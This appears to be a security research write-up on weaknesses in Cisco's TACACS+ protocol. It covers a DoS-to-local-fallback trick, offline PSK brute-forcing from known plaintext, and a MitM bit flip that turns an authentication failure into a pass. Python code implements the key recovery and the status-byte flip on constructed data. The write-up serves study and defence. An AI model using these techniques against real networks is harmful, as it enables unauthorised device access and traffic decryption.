What is TACACS+
Terminal Access Controller Access-Control System Plus (TACACS+) is Cisco's protocol for AAA (authentication, authorization, accounting). In other words, it is a protocol for centralized access control; in most cases that means access to Cisco devices, although other things can be hooked into it as well.
Typically one or two servers run the TACACS+ service (TCP port 49), and every device is configured to use them. So when a user authenticates on a switch, router or other device, the device sends the authentication data to the TACACS+ server; the server checks it, reports the result in a reply packet, and the device decides whether to grant access.

This is convenient and centralized. You can assign different privileges to different users on different devices. Access and actions are logged on the server side. It can be layered on top of another centralized access system such as AD or LDAP. Open-source server implementations exist (Cisco itself once published the code officially).
Attack #1
The first "attack" looks more like a trick than a full-fledged attack, but in certain situations it can come in handy.
Say that during a pentest you obtained the config of a Cisco box (for example, you pulled it from a TFTP server). That is nice, of course, but even if you successfully crack the local accounts, you still can't log in, because the device checks accounts against the TACACS+ server.
But recall the typical configuration used when a device is connected to TACACS+.
Imagine something happens to the TACACS+ server and it becomes unreachable for the Cisco device; the administrator may need to log in to the device and cannot. For exactly this purpose, Cisco devices support several "types" of authentication, which the administrator lists in the configuration.
So the conventional Cisco authentication setup with TACACS+ looks like this:
aaa authentication login default group tacacs+ local
The last two words are what matters here: they say that the device first verifies authentication through TACACS+ and then falls back to the local user database. Note that if TACACS+ says the user is not found, the local database is not consulted.
The essence of the first attack is that we, as the attacker, DoS the TACACS+ server and then connect to the target Cisco device using a local account. DoS here is meant in the broad sense: it could be a special packet (if one is found) or simply a large number of TCP connections...

Introduction to attacks 2 and 3
Before moving on to attacks 2 and 3 we need to learn a bit more about the TACACS+ protocol. Protocol data can be sent in plaintext, or encryption can be enabled. The encryption is built around a PSK (pre-shared key): the administrator sets a single key on the TACACS+ server and on all the clients (devices) connected to it. Moreover, only the user data is encrypted; the TACACS+ header is not. As far as I know, the encryption itself works as follows.
The encrypted data (enc_data) is the result of XORing the data (data) with a special string, pseudo_pad:
data ^ pseudo_pad = enc_data
pseudo_pad is a sequence of MD5 hashes:
pseudo_pad = {MD5_1 [,MD5_2 [ ... ,MD5_n]]}
Each MD5 hash is computed from data in the TACACS+ packet header, the shared key (PSK) and the previous hash (none in the case of the first MD5). That is:
MD5_1 = MD5{session_id, key, version, seq_no}
MD5_2 = MD5{session_id, key, version, seq_no, MD5_1}
....
MD5_n = MD5{session_id, key, version, seq_no, MD5_n-1}
Here session_id is a random session identifier, version is the protocol version, seq_no is the incrementing packet number, and key is the PSK.

So the data appears to be encrypted...
Attack #2
Let's define the task and the situation. There is a Cisco device and a TACACS+ server. We can obtain the encrypted TACACS+ traffic between them (for example, from a man-in-the-middle position). Our goal is to obtain the PSK, use it to decrypt the traffic and get a valid account.
Let's see what we can do. First, the MD5 value is built from several inputs, and only one of them (the shared key) is unknown to us; all the others can be taken from the TACACS+ packet header. So the task reduces to finding the key (if we don't already know it :)). And MD5 can be brute-forced offline very quickly. But for that we need the value MD5_1.
Next, remember that XOR is reversible: if data ^ pseudo_pad = enc_data, then pseudo_pad = data ^ enc_data. XOR is also the simplest of operations: changing one part of the string does not require changing any other part. We want MD5_1, which is the first part of pseudo_pad: 128 bits, or 16 bytes. So to obtain MD5_1 we need the first 16 bytes of the encrypted data and the first 16 bytes of the original data. Encrypted data we can take from the traffic in any quantity, but how do we get 16 bytes of the original data?
It is important to note that requests and replies, and their different types, have different formats (remember that TACACS+ is AAA: authentication, authorization, accounting).
But they still share a common pattern: the first 16 bytes contain almost no random or unknown values.
Without going into detail, here is the most convenient example: the first reply from the TACACS+ server. It contains several fields with identical values and the welcome banner that the Cisco device shows to the user. And since we can obtain that banner just by connecting, we know all the values for certain.

So, knowing almost exactly what the unencrypted data in the packet looks like, we can recover MD5_1 and brute-force the key locally. If that succeeds, the traffic can be decrypted completely.
To simplify parsing packets and extracting MD5_1, I sketched a tool, tac2cat.py (part of the TacoTaco project, see below).
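As an added example (written for this article, not the TacoTaco project's code), here is the pseudo_pad construction from the formulas above together with the two steps of attack 2: recovering MD5_1 from 16 bytes of known plaintext and checking candidate keys offline. It assumes the byte layout of the public TACACS+ specification (session_id as a 4-byte big-endian header field, version and seq_no one byte each, the first server REPLY starting with status GETUSER, flags, server_msg_len and data_len before the banner). The session id, banner and candidate word list are constructed sample values, not captured traffic.

```python
import hashlib
import struct
from typing import Iterable, Optional

# Status of the first server REPLY in an ASCII login (public specification value)
TAC_PLUS_AUTHEN_STATUS_GETUSER = 0x04


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """pseudo_pad = MD5_1 | MD5_2 | ... truncated to `length`, with
    MD5_1 = MD5(session_id, key, version, seq_no) and
    MD5_n = MD5(session_id, key, version, seq_no, MD5_n-1)."""
    header_fields = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(header_fields + prev).digest()
        pad += prev
    return pad[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def obfuscate(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """data ^ pseudo_pad = enc_data; the same call decrypts, since XOR is its own inverse."""
    return xor_bytes(body, pseudo_pad(session_id, key, version, seq_no, len(body)))


def recover_md5_1(enc_body: bytes, known_plaintext: bytes) -> bytes:
    """Attack 2, step one: pseudo_pad = data ^ enc_data, and the first
    16 bytes of pseudo_pad are exactly MD5_1."""
    if len(enc_body) < 16 or len(known_plaintext) < 16:
        raise ValueError("need at least 16 bytes of ciphertext and known plaintext")
    return xor_bytes(enc_body[:16], known_plaintext[:16])


def find_key(md5_1: bytes, session_id: int, version: int, seq_no: int,
             candidates: Iterable[bytes]) -> Optional[bytes]:
    """Attack 2, step two: offline check of candidate keys. Only header fields
    and the key go into MD5_1, so no further traffic is needed."""
    prefix = struct.pack("!I", session_id)
    suffix = bytes([version, seq_no])
    for cand in candidates:
        if hashlib.md5(prefix + cand + suffix).digest() == md5_1:
            return cand
    return None


def first_reply_body(banner: bytes) -> bytes:
    """Constructed first server REPLY body: status, flags, server_msg_len,
    data_len, server_msg. Everything except the banner is fixed, and the
    banner is what the device prints to anyone who connects."""
    return bytes([TAC_PLUS_AUTHEN_STATUS_GETUSER, 0x00]) + struct.pack("!HH", len(banner), 0) + banner


def demo() -> Optional[bytes]:
    # Constructed sample values. The key is the weak one from the lab
    # configuration shown later in the article.
    session_id, version, seq_no = 0x1A2B3C4D, 0xC0, 2
    key = b"12345"
    body = first_reply_body(b"\nUser Access Verification\n\nUsername: ")
    enc_body = obfuscate(body, session_id, key, version, seq_no)

    # Observer side: knows the layout and the banner, hence 16 bytes of plaintext.
    md5_1 = recover_md5_1(enc_body, body[:16])
    wordlist = [b"cisco", b"secret", b"tacacs", b"12345", b"admin"]
    return find_key(md5_1, session_id, version, seq_no, wordlist)


if __name__ == "__main__":
    print("recovered key:", demo())
```

The interesting part for a defender is find_key: once MD5_1 is known, each candidate key costs a single MD5 over a few dozen bytes, so the strength of the PSK is the only thing standing between a passive observer and the full session.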

Attack #3
At the recent Defcon Russia meetup at CC'2015 I talked about these two attacks. And, in the good tradition of our group, during the discussion I received some practical advice. One suggestion was to look into the possibility of bit flipping.
So, the scenario for the last attack: there is a Cisco device and a TACACS+ server, and we can perform an active man-in-the-middle attack (i.e. modify traffic). The goal is to break everything.
Looking more closely at the protocol, two important features surfaced right away. First, the protocol has no integrity check. That is, if we change a value in the encrypted traffic, the change carries straight through into the decrypted traffic (XOR), and the server swallows it without noticing.
The second feature is the packet format. For both authentication and authorization, the main result of the server's reply is carried in the first byte of the reply. For example, 0x01 means authentication succeeded and 0x02 means it failed.

So in total we need to change just one byte! In the simplest form we need to:
- XOR the encrypted byte with its known value to obtain the pseudo_pad byte (we know that if wrong credentials are entered during authentication, it will be rejected, i.e. the value will be 0x02)
- XOR that pseudo_pad byte with the success byte (0x01)
- replace the byte in the encrypted traffic with the result.
Thus, from a MitM position, we turn a rejection of bogus data for authentication or authorization into a permit. In the same way we bypass authentication for privilege escalation on the Cisco device (the enable password).
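An added illustration of the malleability that the three steps above rely on; it was written for this article and is not part of tacflip.py. It stands in for pseudo_pad with a random keystream (the flip works the same way for any XOR stream cipher, whatever produced the pad) and, as a contrast, shows that a keyed integrity tag over the body, which TACACS+ does not have, would reject the modified reply. The reply body, the pad and the tag key are constructed values.

```python
import hashlib
import hmac
import os

# Authentication REPLY status values from the public TACACS+ specification
STATUS_PASS = 0x01
STATUS_FAIL = 0x02


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def flip_status_byte(enc_body: bytes, observed_status: int, desired_status: int) -> bytes:
    """The three steps from the list above, applied to the first body byte only:
    pad = enc ^ known plaintext; new_enc = pad ^ desired; splice it back in."""
    pad_byte = enc_body[0] ^ observed_status
    return bytes([pad_byte ^ desired_status]) + enc_body[1:]


def client_status(enc_body: bytes, pad: bytes) -> int:
    """What the device sees after removing the pad. Nothing here can tell
    whether the body was altered in transit."""
    return xor_bytes(enc_body, pad)[0]


def body_tag(body: bytes, mac_key: bytes) -> bytes:
    """Hypothetical keyed integrity tag (HMAC-SHA256) over the plaintext body.
    TACACS+ has nothing like this; it is here only to show what would catch the flip."""
    return hmac.new(mac_key, body, hashlib.sha256).digest()


def tag_matches(enc_body: bytes, pad: bytes, mac_key: bytes, expected_tag: bytes) -> bool:
    return hmac.compare_digest(body_tag(xor_bytes(enc_body, pad), mac_key), expected_tag)


def demo() -> tuple:
    """Returns (status the device reads, whether an integrity tag would have flagged it)."""
    # Constructed REPLY to bad credentials: status FAIL, flags 0, server_msg_len,
    # data_len 0, server_msg; plus a random stand-in keystream and tag key.
    server_msg = b"Authentication failed"
    body = (bytes([STATUS_FAIL, 0x00]) + len(server_msg).to_bytes(2, "big")
            + (0).to_bytes(2, "big") + server_msg)
    pad = os.urandom(len(body))
    mac_key = os.urandom(32)
    enc_body = xor_bytes(body, pad)
    genuine_tag = body_tag(body, mac_key)

    tampered = flip_status_byte(enc_body, STATUS_FAIL, STATUS_PASS)
    seen = client_status(tampered, pad)  # decrypts to STATUS_PASS
    detected = not tag_matches(tampered, pad, mac_key, genuine_tag)
    return seen, detected


if __name__ == "__main__":
    seen, detected = demo()
    print(f"device reads status 0x{seen:02x}; integrity tag would flag it: {detected}")
```

Note that flip_status_byte never needs the key or the pad as a whole: one known plaintext byte at a known offset is enough, which is why the lack of an integrity check matters more here than the strength of the PSK.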
As a result, a tool was written to implement this attack: tacflip.py (part of the TacoTaco project).
Operation (bypass of authentication and authorization) was verified against a 7200 Cisco in GNS3 and the open-source TACACS+ server implementation tac_plus.
Part of the TACACS+ configuration:
aaa authentication login default group tacacs+ local
aaa authentication enable default group tacacs+
aaa authorization exec default group tacacs+ local
tacacs-server host 192.168.182.136
tacacs-server directed-request
tacacs-server key 12345
And here is a small demo of logging in to the device, escalating privileges and executing commands.
The state of things...
Back in 2000, Solar Designer wrote an interesting overview of the protocol (goo.gl/E2IGnk). It found, for example, the possibility of replay attacks, disclosure of the length of the user's password (because there is no padding) and a few other things (bit flipping). But I could not find any practical implementations of them in public... Moreover, my "review" of this protocol is not a focused study but rather a list of chance encounters with the protocol over a long period. Which is why I forgot about Solar Designer's results and rediscovered some things.
Still, the main result of my work is a set of working tools (beta so far).
The TacoTaco project: github.com/GrrrDog/TacoTaco
In summary:
We can probably conclude that the TACACS+ protocol and its implementations do not provide the required level of protection against MitM attacks.
On the other hand, in many cases the TACACS+ server is placed in a VLAN that only administrators and network equipment can reach, which makes these attacks harder (Cisco gives the same recommendation). But that is a separate task.